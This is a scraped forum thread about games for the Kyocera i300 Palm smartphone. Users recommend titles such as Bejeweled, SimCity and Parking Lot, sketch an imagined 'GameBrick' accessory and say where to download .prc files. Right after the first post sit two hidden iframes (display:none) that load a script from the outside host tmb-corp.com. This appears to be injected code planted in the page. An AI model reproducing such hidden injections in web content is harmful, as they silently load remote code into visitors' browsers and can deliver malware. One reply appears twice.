+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

Games on the I-300

Greetings All:

I've been playing Dragon Bane II on my I-300, and enjoying it greatly.

I'de be interested to know what other games people have been installing and playing on thier I-300's?

Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    I-Love-Toys

Bubblet, I play that the most. Then its bejeweled....

I'm big on bewjeweled too. The palm version is Much better than any of the online ones I've seen. HIGHLY addictive.

Administrator

Arrow

i lke the golf game that came with the phone.. i play billiards, pinball, tennis, and a RPG game. :p

smartphonecentral.com
    I'm liking the arcade pseudo-emulators: Galax and Froggy are fun. And Pac-Man, of course. Some of the old Williams games (Joust, Defender, and Sinistar), while being darn near impossible to play, are impressive in their appearance and performance.

The new Harry Potter 3v Quidditch is also a lot of fun.

--Jesse

Administrator

Arrow

Some of the old Williams games (Joust, Defender, and Sinistar), while being darn near impossible to play,
    in what way? the game itself is hard or the palm controls make game play sluggish??? i never thought these original games were out there for the palm... u learn something everyday!:o

smartphonecentral.com
    I find the games' action is too fast to manipulate with the poorly-placed (for games) buttons on the i300. The games look and perform very well. Although clearly not straight emulators, they're impressively close to their arcade counterparts.

I'd like to see a MAME emulator for the Palm OS, but even the old games run at higher than 160x160, so it may not work even if it could be developed.

Am I the only one that recalls Marc saying he wouldn't install anything on his I300?

I had Tetris (block party) on my PalmV, but when I converted to the I300 it would not work.
    Anyone know of a version of Tetris that will work on the I300?

I am playing bejeweled and I am addicted, both on the I300 and my laptop
    michaelb92

Bejeweled addict :-)

Yep. Slowing down a little now, but it's my favorite game on the i300.

games

Ringz!
    Mk

The only games that I recommend you stay away from on the I300 are the ones with a lot of motion in terms of graphics. Zap2000 (one of my favorite games on the M505) is kind of frustrating on the I300, because the screen colors bleed to much when the action gets intense. The new Iambic pinball game "Bump Attack" is also a little taxing on the screen.

Bubble Pop is addictive. I hate it because I always end up playing it on trips and killing my battery (oh, is the plane landing already?)

Ababall (also from Iambic) is pretty good too. It is your standard breakout game, but classics become classics for a reason.

Administrator

Arrow

"hardball" is the same as the breakout game and its in the add on folder on your palm desktop.

I'm a game junkie

My top three games are Bejeweled, Scrabble, and Simcity. Beyond that, I have Parking Lot, Vexed, HMaki, and a holdem poker game that I still play on occasion.

SimCity is great when you're bored in meetings-- it keeps you occupied, but it's not so fast-paced that you lose track of what's going on.

-Patti

Cool future i300 accessory

Cool future peripheral -- A combination joypad and 8mb RAM expander the same width and thickness of the i300, contoured to firmly snap on to the bottom and become a seamless extension of the i300. Let's call it the GameBrick.

How I foresee it working:

The GameBrick itself would have a "normal" i300 hotsync port on the bottom (or a snap-on cartridge adapter that would enable it to be plugged into the i300's own cradle upside down). Big, rarely-used applications like Rayman, Serious Sam, etc. would have their prc/pdb files copied to the GameBrick using the GameBrick's own PC-hosted installer (which would also associate the files together).

The installer would also create a prc file for installation to the i300 itself that would launch the GameBrick's i300-based program manager ("GBPM").

At some point in the future when the user attempts to launch the GameBrick-hosted application, GBPM would determine whether the pdb file(s) of the most recently used GameBrick Application had changed while in the i300, replace the copy stored on the GameBrick with the changed copy if necessary, unload the application -- optionally leaving any additional database records related to it intact so they'd still be there for later use by the application, and replace its icon data with a stub to launch GBPM instead.

GBPM would then tell the GameBrick what application to install, and initiate a hotsync with the GameBrick, which would pretend to be a PC running Hotsync Manager and install the requested application to the i300. Thereafter, clicking the application's icon would run the application itself... at least, until the user wanted to run a different GameBrick-hosted application, whereupon it would repeat the process with a diffent application.

DOWNSIDES: It's an obvious kludge. At 115kbps, a program swap for a 1.5mb application would take a few minutes -- especially if a big pdb data chunk changed and it had to copy the previous application's pdb file back to the GameBrick first.

UPSIDES: Users could keep nearly every best-of-breed PalmOS game ready for more or less immediate use, and have a great gamepad as well.

FEASIBILITY: If cost were no object, it's entirely feasible. Look at Palm's own backup blobs (sorry, I don't remember their real name offhand) that plug in to the hotsync port and let users back up their device to them. Make the form factor bigger, add a gamepad, and you've basically got the GameBrick hardware I described. The software wouldn't be an afternoon project by any means, but it's certainly not beyond the abilities of a few experienced Palm App and conduit developers. On the other hand, it would be really hard to sell something like this for more than $100... somewhere around $79 would be ideal. I don't know whether it would be cost-effective to make and sell at that price.

USABILITY: Configuring it to optimally handle different applications might be a challenge for naive users, because different programs would ideally be handled in different ways. With some applications, it would be OK to discard changes made to the application's database while loaded in the i300. Or even the application's additional database records, if the user actually WANTS the program to act as though it were newly installed for the first time after installation from the GameBrick. On the other hand, since nearly everyone with an i300 has internet access on his PC anyway, it would be pretty easy for the GameBrick's PC-based installer to just go online when installing new applications to hunt for predefined application prefs for that specific application.

Administrator

Re: I'm a game junkie

Originally posted by Patti
    Beyond that, I have Parking Lot...
    -Patti
    what is parking lot? is it a fun game???

Ah, but where do you find them?
    I recently did a search on tucows, and some pilot sites and downloaded the .prc files.
    My installer did not like them - it took them but they are not visible and do not load.

looks like it wants .pnc files.

Parking Lot, etc.

Parking lot is a fun game if you like simplistic puzzles. You have a bunch of cars of various lengths, and you have to shuffle them around in order to get "your" car out the exit. There's a very similar game called Traffic.

Vexed is another simple puzzle game that's utterly absorbing until you solve it.

As for where I got them, my games generally come from either palmgear.com or download.com. Several (SimCity, Scrabble, Bejeweled) are commercial, and I've happily paid the registration fee. And yes, they're .prcs.

What I really wish for is a Paradise Poker (online poker server) client for the Palm, so that I could play poker and make money while sitting in coffee shops.

-Patti

Parking Lot, etc.

Parking lot is a fun game if you like simplistic puzzles. You have a bunch of cars of various lengths, and you have to shuffle them around in order to get "your" car out the exit. There's a very similar game called Traffic.

Vexed is another simple puzzle game that's utterly absorbing until you solve it.

As for where I got them, my games generally come from either palmgear.com or download.com. Several (SimCity, Scrabble, Bejeweled) are commercial, and I've happily paid the registration fee. And yes, they're .prcs.

What I really wish for is a Paradise Poker (online poker server) client for the Palm, so that I could play poker and make money while sitting in coffee shops.

-Patti

You can find Tetris for palm at palmgear.com